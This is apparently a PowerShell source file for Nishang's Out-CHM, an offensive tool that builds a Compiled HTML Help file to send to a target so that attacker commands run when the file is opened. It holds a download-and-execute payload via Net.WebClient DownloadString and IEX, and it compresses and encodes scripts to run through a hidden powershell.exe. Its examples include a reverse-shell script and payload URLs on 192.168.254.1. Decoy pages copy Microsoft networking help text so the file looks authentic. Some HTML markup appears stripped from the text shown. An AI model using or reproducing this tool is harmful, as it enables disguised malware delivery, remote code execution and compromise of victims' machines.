function Out-CHM { <# .SYNOPSIS Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts. .DESCRIPTION The script generates a CHM file which needs to be sent to a target. You must have hhc.exe (HTML Help Workshop) on your machine to use this script. HTML Help Workshop is a free Microsoft Tool and could be downloaded from below link: http://www.microsoft.com/en-us/download/details.aspx?id=21138 .PARAMETER Payload Payload which you want execute on the target. .PARAMETER PayloadURL URL of the PowerShell script which would be executed on the target. .PARAMETER PayloadScript Path to a PowerShell script on local machine. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. .PARAMETER Arguments Arguments to the PowerShell script to be executed on the target. .PARAMETER HHCPath Path to the HTML Help Workshop on the attacker's machine. .PARAMETER OutputPath Path to the directory where the files would be saved. Default is the current directory. .EXAMPLE PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Above command would execute Get-Process on the target machine when the CHM file is opened. .EXAMPLE PS > Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. .EXAMPLE PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above command to generate CHM file which download and execute the given PowerShell script in memory on target. .EXAMPLE PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above command to generate CHM file which executes the encoded command/script. Use Invoke-Encode from Nishang to encode the command or script. .EXAMPLE PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Use above command to pass an argument to the PowerShell script/module. .EXAMPLE PS > Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself. .LINK http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html https://github.com/samratashok/nishang .Notes Based on the work mentioned in this tweet by @ithurricanept https://twitter.com/ithurricanept/status/534993743196090368 #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $Payload, [Parameter(Position = 1, Mandatory = $False)] [String] $PayloadURL, [Parameter(Position = 2, Mandatory = $False)] [String] $PayloadScript, [Parameter(Position = 3, Mandatory = $False)] [String] $Arguments, [Parameter(Position = 4, Mandatory = $True)] [String] $HHCPath, [Parameter(Position = 5, Mandatory = $False)] [String] $OutputPath="$pwd" ) #Check if the payload has been provided by the user if(!$Payload) { $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" } if($PayloadScript) { #Logic to read, compress and Base64 encode the payload script. $Enc = Get-Content $PayloadScript -Encoding Ascii #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html $ms = New-Object IO.MemoryStream $action = [IO.Compression.CompressionMode]::Compress $cs = New-Object IO.Compression.DeflateStream ($ms,$action) $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII) $Enc | ForEach-Object {$sw.WriteLine($_)} $sw.Close() # Base64 encode stream $Compressed = [Convert]::ToBase64String($ms.ToArray()) $command = "Invoke-Expression `$(New-Object IO.StreamReader (" + "`$(New-Object IO.Compression.DeflateStream (" + "`$(New-Object IO.MemoryStream (,"+ "`$([Convert]::FromBase64String('$Compressed')))), " + "[IO.Compression.CompressionMode]::Decompress)),"+ " [Text.Encoding]::ASCII)).ReadToEnd();" #Generate Base64 encoded command to use with the powershell -encodedcommand paramter" $UnicodeEncoder = New-Object System.Text.UnicodeEncoding $EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command)) if ($EncScript.Length -gt 8100) { Write-Warning "Payload too big for CHM! Try a smaller payload." break } else { $Payload = "powershell.exe -WindowStyle hidden -nologo -noprofile -e $EncScript" } } #Create the table of contents for the CHM $CHMTableOfContents = @" "@ #Create the Project file for the CHM $CHMProject = @" [OPTIONS] Contents file=$OutputPath\doc.hhc [FILES] $OutputPath\doc.htm $OutputPath\doc1.htm "@ #Create the HTM files, the first one controls the payload execution. $CHMHTML1 = @" Check for Windows updates from Command Line IPv4 Advanced IP Settings Tab

You can use the settings on this tab for this network connection only if you are not using the Obtain an IP address automatically on the General tab.

IP addresses lists additional Internet Protocol version 4 (IPv4) addresses that can be assigned to this network connection. There is no limit to the number of IP addresses that can be configured. This setting is useful if this computer connects to a single physical network but requires advanced IP addressing because of either of the following reasons:

Default gateways lists IP addresses for additional default gateways that can be used by this network connection. A default gateway is a local IP router that is used to forward packets to destinations beyond the local network.

Automatic metric specifies whether TCP/IP automatically calculates a value for an interface metric that is based on the speed of the interface. The highest-speed interface has the lowest interface metric value.

Interface metric provides a location for you to type a value for the interface metric for this network connection. A lower value for the interface metric indicates a higher priority for use of this interface.

Procedures

To configure additional IP addresses for this connection

  1. In IP Addresses, click Add.

  2. Type an IP address in IP address.

  3. Type a subnet mask in Subnet mask, and then click Add.

  4. Repeat steps 1 through 3 for each IP address you want to add, and then click OK.
To configure additional default gateways for this connection

  1. On the IP Settings tab, in Default gateways, click Add.

  2. In TCP/IP Gateway Address, type the IP address of the default gateway in Gateway. To manually configure a default route metric, clear the Automatic metric check box and type a metric in Metric.

  3. Click Add.

  4. Repeat steps 1 through 3 for each default gateway you want to add, and then click OK.
To configure a custom metric for this connection

  • Clear the Automatic metric check box, and then type a metric value in Interface metric.

Additional references

For updated detailed IT pro information about TCP/IP versions 4 and 6, see http://go.microsoft.com/fwlink/?LinkID=117437 and http://go.microsoft.com/fwlink/?LinkID=71543.

"@ #Second help topic to make the file look authentic. $CHMHTML2 = @" IPv4 Advanced WINS Tab

You can use the settings on this tab for this network connection only if you are not using the Obtain an IP address automatically on the General tab.

WINS addresses, in order of use lists the Windows Internet Name Service (WINS) servers that TCP/IP queries to resolve network basic input/output system (NetBIOS) names. WINS servers are queried in the order in which they are listed here.

Enable LMHOSTS lookup specifies whether an Lmhosts file is used to resolve the NetBIOS names of remote computers to an IP address.

Click Import LMHOSTS to import a file into the Lmhosts file. The Lmhosts file is located in the %SystemRoot%\System32\Drivers\Etc folder on a Windows-based computer. There is also a sample Lmhosts file (Lmhosts.sam) in this folder. When you import LMHOSTS from a file, the original Lmhosts file is not appended to, but is overwritten by the new file.

NetBIOS setting specifies whether this network connection obtains the setting to enable or disable NetBIOS over TCP/IP (NetBT) from a Dynamic Host Configuration Protocol (DHCP) server.

When an IP address is automatically obtained, the Default option is selected so that this computer uses the NetBT setting as optionally provided by the DHCP server when this computer obtains an IP address and configuration lease. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is provided by the DHCP server, the value of the option determines whether NetBT is enabled or disabled. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is not provided by the DHCP server, NetBT is enabled.

If you are manually configuring an IP address, selecting Enable NetBIOS over TCP/IP enables NetBT. This option is not available for dial-up connections.

Procedures

To configure advanced WINS properties

  1. In WINS addresses, in order of use, click Add, type the address of the WINS server, and then click Add.

  2. Repeat step 1 for each WINS server IP address you want to add, and then click OK.
To enable the use of the Lmhosts file to resolve remote NetBIOS names

  • Select the Enable LMHOSTS lookup check box. This option is enabled by default.
To specify the location of the file that you want to import into the Lmhosts file

  • Click Import LMHOSTS, and then select the file in the Open dialog box.
To enable or disable NetBIOS over TCP/IP

  • To enable the use of NetBIOS over TCP/IP, click Enable NetBIOS over TCP/IP.

  • To disable the use of NetBIOS over TCP/IP, click Disable NetBIOS over TCP/IP.

  • To have the DHCP server determine whether NetBIOS over TCP/IP is enabled or disabled, click Default.

Additional references

For updated detailed IT pro information about TCP/IP versions 4 and 6, see http://go.microsoft.com/fwlink/?LinkID=117437 and http://go.microsoft.com/fwlink/?LinkID=71543.

"@ #Write all files to disk for compilation Out-File -InputObject $CHMTableOfContents -FilePath "$OutputPath\doc.hhc" -Encoding default Out-File -InputObject $CHMHTML1 -FilePath "$OutputPath\doc.htm" -Encoding default Out-File -InputObject $CHMHTML2 -FilePath "$OutputPath\doc1.htm" -Encoding default Out-File -InputObject $CHMProject -FilePath "$OutputPath\doc.hhp" -Encoding default #Compile the CHM, only this needs to be sent to a target. $HHC = "$HHCPath" + "\hhc.exe" & "$HHC" "$OutputPath\doc.hhp" #Cleanup Remove-Item "$OutputPath\doc.hhc" Remove-Item "$OutputPath\doc.htm" Remove-Item "$OutputPath\doc1.htm" Remove-Item "$OutputPath\doc.hhp" }